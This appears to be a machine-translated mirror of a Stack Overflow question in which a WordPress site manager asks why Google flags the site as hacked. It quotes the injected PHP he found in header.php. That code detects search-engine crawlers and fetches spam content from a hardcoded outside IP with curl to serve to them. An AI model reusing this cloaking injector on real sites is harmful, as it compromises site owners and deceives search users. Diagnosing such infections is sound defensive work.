首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >据谷歌报道,Wordpress网站Hacked是真的吗?

据谷歌报道,Wordpress网站Hacked是真的吗?
EN

Stack Overflow用户
提问于 2017-06-14 02:57:52
回答 1查看 316关注 0票数 1

我是www.cuscalgary.ca的网站经理。如果你在谷歌搜索"cus calgary“,我的网站上有几个链接,在链接描述(见下面的截图)中似乎有奇怪的荷兰字符串,比如”k pa viagra snabb利用“。此外,我得到了臭名昭著的“这个网站可能被黑”的信息,就在我的网站的主要链接在谷歌。

到目前为止,我已经尝试通过Google浏览器和CTRL+F检查页面代码,以查找搜索结果上显示的单词(例如,试图在Contact Us页面中找到"Paul Junker“),我尝试下载主题文件夹,并通过notepad++执行”搜索文件夹“功能,以查找任何这些奇怪的字符串。我甚至尝试通过Wordpress仪表板查找这些字符串中的任何一个。唉,我没有发现这些奇怪的弦的迹象。

我开始认为Google可能已经有一段时间没有爬上我的网站了,这些字符串已经被删除了。不过,我怀疑情况是否如此。

有没有人有类似的经验,他们找到了解决办法?如果是这样的话,我很想听听你是如何处理这个麻烦的。

非常感谢你的帮助-所有的帮助都是非常感谢的。

凯尔西

更新:

我可能在header.php文件中找到了罪犯。查看我在下面文件开头找到的代码:

代码语言:javascript
复制
<?php

$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',

                               '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',

                               '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',

                               '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',

                               '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*note#i', '#FAST\s*MetaWeb\s*Crawler#i',

                               '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',

                               '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',

                               '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',

                               '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',

                               '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',

                               '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',

                               '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',

                               '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',

                               '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',

                               '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',

                               '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',

                               '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',

                               '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;



if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){

    $isbot = 1;

    }



if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google')) 

{

    $isbot = 1;

}



if(@$isbot){



$_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);

$ch = curl_init();    

    curl_setopt($ch, CURLOPT_URL, "http://173.236.65.24/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");   

    $result = curl_exec($ch);       

curl_close ($ch);  



    echo $result;

}

?><!DOCTYPE html>
EN

回答 1

Stack Overflow用户

回答已采纳

发布于 2017-06-14 03:13:11

有可能是的。但是如果不能访问网站本身,很难仅仅从你列出的搜索结果中判断。

安装类似Wordfence (我喜欢的)的东西,让它扫描你的网站。它应该对您服务器上的文件和WP回购处的文件进行比较,如果有任何更改,请通知您。它甚至可能告诉你一些你不知道的事情。

票数 2
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/44534667

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档